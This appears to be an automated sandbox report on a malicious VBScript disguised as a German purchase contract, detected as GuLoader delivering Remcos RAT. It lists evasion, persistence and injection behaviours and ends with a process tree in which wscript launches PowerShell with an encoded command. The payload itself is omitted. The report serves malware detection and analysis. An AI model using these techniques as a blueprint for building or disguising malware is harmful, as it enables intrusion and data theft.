Analysis Report
tregrene-KaufVertraeg-JoachimSvensson-23564334.vbs
Overview
General Information
Detection
Remcos GuLoader
Score: 100 (range: 0 - 100)
Whitelisted: false
Confidence: 100%
Signatures
Found malware configuration
Yara detected Remcos RAT
Detected Remcos RAT
Yara detected GuLoader
Hides threads from debuggers
Creates an autostart registry key pointing to binary in C:\Windows
Writes to foreign memory regions
Tries to detect Any.run
Wscript starts Powershell (via cmd or directly)
Potential malicious VBS script found (suspicious strings)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Encrypted powershell cmdline option found
Very long command line found
Suspicious powershell command line found
Creates autostart registry keys with suspicious values (likely registry only malware)
C2 URLs / IPs found in malware configuration
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Sleep loop found (likely to delay execution)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Java / VBScript file with very long strings (likely obfuscated code)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Sigma detected: Suspicious Csc.exe Source File Folder
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Compiles C# or VB.Net code
Sigma detected: Suspicious Execution of Powershell with Base64
Creates a process in suspended mode (likely to inject code)
Sigma detected: Autorun Keys Modification
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Classification
- System is w10x64native
- wscript.exe (PID: 1396, cmdline: C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\tregrene-KaufVertraeg-JoachimSvensson-23564334.vbs", MD5: 0639B0A6F69B3265C1E42227D650B7D1)
  - powershell.exe (PID: 1568, cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -NoExit -EncodedCommand "[base64-encoded command omitted; the report truncates the blob]")